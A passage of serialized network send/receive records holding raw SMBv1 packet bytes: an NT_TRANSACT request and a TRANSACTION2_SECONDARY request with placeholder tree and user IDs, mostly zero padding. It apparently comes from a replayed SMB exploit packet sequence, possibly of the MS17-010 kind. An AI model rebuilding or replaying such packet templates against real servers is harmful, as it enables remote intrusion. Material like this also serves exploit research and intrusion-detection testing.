b'\\\\x00\\\\x00\\\\x048\\\\xffSMB\\\\xa0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\x14\\\\x01\\\\x00\\\\x00\\\\x1e\\\\x00\\\\x00\\\\x00\\\\xd0\\\\x03\\\\x01\\\\x00\\\\x1e\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x1e\\\\x00\\\\x00\\\\x00K\\\\x00\\\\x00\\\\x00\\\\xd0\\\\x03\\\\x00\\\\x00h\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\xec\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x03\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\